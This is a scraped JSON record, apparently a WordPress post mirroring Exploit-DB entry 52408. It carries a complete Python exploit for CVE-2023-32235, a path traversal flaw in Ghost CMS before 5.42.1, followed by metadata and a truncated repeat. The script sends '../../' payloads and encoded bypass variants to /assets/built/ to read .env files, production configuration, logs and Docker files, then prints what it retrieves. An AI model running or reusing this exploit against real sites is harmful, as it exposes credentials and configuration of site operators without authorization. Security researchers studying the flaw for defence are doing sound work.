{“lastseen”:”2025-08-11T18:06:44″,”description”:”!\/usr\/bin\/env python3 –…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Ghost CMS 5.42.1 – Path Traversal”,”source”:””,”references”:””,”id”:”EDB-ID:52408″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-32235″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\”\\”\\”\\r\\n# Exploit Title: Ghost CMS 5.42.1 – Path Traversal\\r\\n# Date: 2023-06-15\\r\\n# Exploit Author:ibrahimsql (https:\/\/github.com\/ibrahimsql)\\r\\n# Vendor Homepage: https:\/\/ghost.org\\r\\n# Software Link: https:\/\/github.com\/TryGhost\/Ghost\\r\\n# Version: \\u003c 5.42.1\\r\\n# Tested on: Kali Linux 2024.1 Windows 10, macOS Big Sur\\r\\n# CVE: CVE-2023-32235\\r\\n# Category: Web Application Security\\r\\n# CVSS Score: 7.5 (High)\\r\\n# Description:\\r\\n# Ghost CMS before version 5.42.1 contains a path traversal vulnerability that allows\\r\\n# remote attackers to read arbitrary files within the active theme’s folder structure.\\r\\n# The vulnerability exists in the \/assets\/built\/ endpoint which improperly handles\\r\\n# directory traversal sequences (..\/..\/) allowing unauthorized file access.\\r\\n# This can lead to disclosure of sensitive configuration files, environment variables,\\r\\n# and other critical application data.\\r\\n\\r\\n# Impact:\\r\\n# – Unauthorized file disclosure\\r\\n# – Potential exposure of configuration files\\r\\n# – Information gathering for further attacks\\r\\n# – Possible credential harvesting\\r\\n\\r\\n# Requirements: requests\\u003e=2.28.1\\r\\n\\”\\”\\”\\r\\n\\r\\nimport requests\\r\\nimport sys\\r\\nimport urllib.parse\\r\\nfrom typing import Dict, List, Tuple, Optional\\r\\n\\r\\nclass ExploitResult:\\r\\n def __init__(self):\\r\\n self.success = False\\r\\n self.payload = \\”\\”\\r\\n self.response = \\”\\”\\r\\n self.status_code = 0\\r\\n self.description = \\”Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme’s folder via \/assets\/built\/..\/..\/\/ directory traversal\\”\\r\\n self.severity = \\”High\\”\\r\\n\\r\\nclass PathTraversalExploit:\\r\\n def __init__(self, target_url: str, verbose: bool = True):\\r\\n self.target_url = target_url.rstrip(‘\/’)\\r\\n self.verbose = verbose\\r\\n self.session = requests.Session()\\r\\n self.session.headers.update({\\r\\n ‘Accept’: ‘*\/*’,\\r\\n ‘Cache-Control’: ‘no-cache’,\\r\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\r\\n })\\r\\n \\r\\n def exploit(self) -\\u003e ExploitResult:\\r\\n result = ExploitResult()\\r\\n \\r\\n # path traversal payloads targeting Ghost CMS specific files\\r\\n payloads = [\\r\\n {\\”path\\”: \\”..\/..\/package.json\\”, \\”description\\”: \\”Main package.json with dependencies\\”, \\”sensitive\\”: True},\\r\\n {\\”path\\”: \\”..\/..\/..\/package.json\\”, \\”description\\”: \\”Root package.json\\”, \\”sensitive\\”: True},\\r\\n {\\”path\\”: \\”..\/..\/config.production.json\\”, \\”description\\”: \\”Production configuration\\”, \\”sensitive\\”: True},\\r\\n {\\”path\\”: \\”..\/..\/config.development.json\\”, \\”description\\”: \\”Development configuration\\”, \\”sensitive\\”: True},\\r\\n {\\”path\\”: \\”..\/..\/.env\\”, \\”description\\”: \\”Environment variables\\”, \\”sensitive\\”: True},\\r\\n {\\”path\\”: \\”..\/..\/..\/.env\\”, \\”description\\”: \\”Root environment file\\”, \\”sensitive\\”: True},\\r\\n {\\”path\\”: \\”..\/..\/content\/settings\/routes.yaml\\”, \\”description\\”: \\”Routes configuration\\”, \\”sensitive\\”: False},\\r\\n {\\”path\\”: \\”..\/..\/content\/logs\/ghost.log\\”, \\”description\\”: \\”Ghost application logs\\”, \\”sensitive\\”: False},\\r\\n {\\”path\\”: \\”..\/..\/README.md\\”, \\”description\\”: \\”Documentation file\\”, \\”sensitive\\”: False},\\r\\n {\\”path\\”: \\”..\/..\/yarn.lock\\”, \\”description\\”: \\”Yarn lock file\\”, \\”sensitive\\”: False},\\r\\n {\\”path\\”: \\”..\/..\/package-lock.json\\”, \\”description\\”: \\”NPM lock file\\”, \\”sensitive\\”: False},\\r\\n {\\”path\\”: \\”..\/..\/..\/Dockerfile\\”, \\”description\\”: \\”Docker configuration\\”, \\”sensitive\\”: False},\\r\\n {\\”path\\”: \\”..\/..\/..\/docker-compose.yml\\”, \\”description\\”: \\”Docker compose file\\”, \\”sensitive\\”: False}\\r\\n ]\\r\\n \\r\\n for payload in payloads:\\r\\n target_url = f\\”{self.target_url}\/assets\/built\/{payload[‘path’]}\\”\\r\\n \\r\\n if self.verbose:\\r\\n print(f\\”[*] Testing path traversal: {payload[‘path’]}\\”)\\r\\n \\r\\n try:\\r\\n response = self.session.get(target_url, timeout=10)\\r\\n \\r\\n if response.status_code == 200 and len(response.text) \\u003e 0:\\r\\n if self._detect_file_read_success(response.text, payload[‘path’]):\\r\\n result.success = True\\r\\n result.payload = payload[‘path’]\\r\\n result.response = response.text\\r\\n result.status_code = response.status_code\\r\\n \\r\\n if payload[‘sensitive’]:\\r\\n result.severity = \\”Critical\\”\\r\\n \\r\\n if self.verbose:\\r\\n print(f\\”[+] Successfully exploited path traversal: {payload[‘path’]}\\”)\\r\\n print(f\\”[+] File content preview: {response.text[:200]}\\”)\\r\\n return result\\r\\n \\r\\n except requests.RequestException as e:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Request failed for {payload[‘path’]}: {e}\\”)\\r\\n continue\\r\\n \\r\\n # If no direct file read, try alternative bypass techniques\\r\\n if not result.success:\\r\\n self._try_path_traversal_bypasses(result)\\r\\n \\r\\n return result\\r\\n \\r\\n def _try_path_traversal_bypasses(self, result: ExploitResult):\\r\\n \\”\\”\\”Try various bypass techniques for path traversal\\”\\”\\”\\r\\n bypass_payloads = [\\r\\n \\”..%2f..%2fpackage.json\\”, # URL encoded\\r\\n \\”..%252f..%252fpackage.json\\”, # Double URL encoded\\r\\n \\”….\/\/….\/\/package.json\\”, # Double dot bypass\\r\\n \\”..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\package.json\\”, # Windows style\\r\\n \\”.%2e\/.%2e\/package.json\\”, # Mixed encoding\\r\\n \\”..%c0%af..%c0%afpackage.json\\”, # UTF-8 overlong encoding\\r\\n ]\\r\\n \\r\\n for payload in bypass_payloads:\\r\\n target_url = f\\”{self.target_url}\/assets\/built\/{payload}\\”\\r\\n \\r\\n try:\\r\\n response = self.session.get(target_url, timeout=10)\\r\\n \\r\\n if response.status_code == 200 and self._detect_file_read_success(response.text, payload):\\r\\n result.success = True\\r\\n result.payload = payload\\r\\n result.response = response.text\\r\\n result.status_code = response.status_code\\r\\n \\r\\n if self.verbose:\\r\\n print(f\\”[+] Path traversal successful using encoding bypass: {payload}\\”)\\r\\n break\\r\\n \\r\\n except requests.RequestException:\\r\\n continue\\r\\n \\r\\n def _detect_file_read_success(self, body: str, payload: str) -\\u003e bool:\\r\\n \\”\\”\\”Check if the response indicates successful file read\\”\\”\\”\\r\\n # Check for common file content indicators\\r\\n file_indicators = {\\r\\n \\”package.json\\”: [‘\\”name\\”‘, ‘\\”version\\”‘, ‘\\”dependencies\\”‘, ‘\\”scripts\\”‘],\\r\\n \\”.env\\”: [\\”DATABASE_URL\\”, \\”NODE_ENV\\”, \\”GHOST_\\”, \\”=\\”],\\r\\n \\”config\\”: [‘\\”database\\”‘, ‘\\”server\\”‘, ‘\\”url\\”‘, ‘\\”mail\\”‘],\\r\\n \\”routes.yaml\\”: [\\”routes:\\”, \\”collections:\\”, \\”taxonomies:\\”],\\r\\n \\”ghost.log\\”: [\\”INFO\\”, \\”ERROR\\”, \\”WARN\\”, \\”Ghost\\”],\\r\\n \\”README\\”: [\\”#\\”, \\”##\\”, \\”Ghost\\”, \\”installation\\”],\\r\\n \\”Dockerfile\\”: [\\”FROM\\”, \\”RUN\\”, \\”COPY\\”, \\”EXPOSE\\”],\\r\\n \\”docker-compose\\”: [\\”version:\\”, \\”services:\\”, \\”ghost:\\”]\\r\\n }\\r\\n \\r\\n # Check specific file type indicators\\r\\n for file_type, indicators in file_indicators.items():\\r\\n if file_type.lower() in payload.lower():\\r\\n for indicator in indicators:\\r\\n if indicator in body:\\r\\n return True\\r\\n \\r\\n # Generic file content indicators\\r\\n generic_indicators = [\\”{\\”, \\”}\\”, \\”[\\”, \\”]\\”, \\”:\\”, \\”=\\”, \\”version\\”, \\”name\\”, \\”description\\”]\\r\\n \\r\\n count = sum(1 for indicator in generic_indicators if indicator in body)\\r\\n \\r\\n # If multiple generic indicators found, likely a valid file\\r\\n return count \\u003e= 3\\r\\n\\r\\ndef main():\\r\\n if len(sys.argv) \\u003c 2:\\r\\n print(\\”Usage: python3 CVE-2023-32235.py \\u003ctarget_url\\u003e\\”)\\r\\n print(\\”Example: python3 CVE-2023-32235.py http:\/\/target.com\\”)\\r\\n return\\r\\n \\r\\n exploit = PathTraversalExploit(sys.argv[1], verbose=True)\\r\\n result = exploit.exploit()\\r\\n \\r\\n print(\\”\\\\n=== CVE-2023-32235 Path Traversal Exploit Results ===\\”)\\r\\n print(f\\”Target: {exploit.target_url}\\”)\\r\\n print(f\\”Success: {result.success}\\”)\\r\\n print(f\\”Severity: {result.severity}\\”)\\r\\n print(f\\”Description: {result.description}\\”)\\r\\n \\r\\n if result.success:\\r\\n print(f\\”Payload: {result.payload}\\”)\\r\\n print(f\\”Status Code: {result.status_code}\\”)\\r\\n print(f\\”Response Preview: {result.response[:500]}\\”)\\r\\n else:\\r\\n print(\\”Exploit failed – target may not be vulnerable\\”)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52408″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52408″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-11T18:06:44″,”description”:”!\/usr\/bin\/env python3 –…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Ghost CMS 5.42.1 – Path Traversal”,”source”:””,”references”:””,”id”:”EDB-ID:52408″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-32235″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\”\\”\\”\\r\\n# Exploit Title: Ghost CMS 5.42.1 – Path Traversal\\r\\n# Date: 2023-06-15\\r\\n# Exploit Author:ibrahimsql…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,40,15,13,7,11,5],"class_list":["post-10383","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n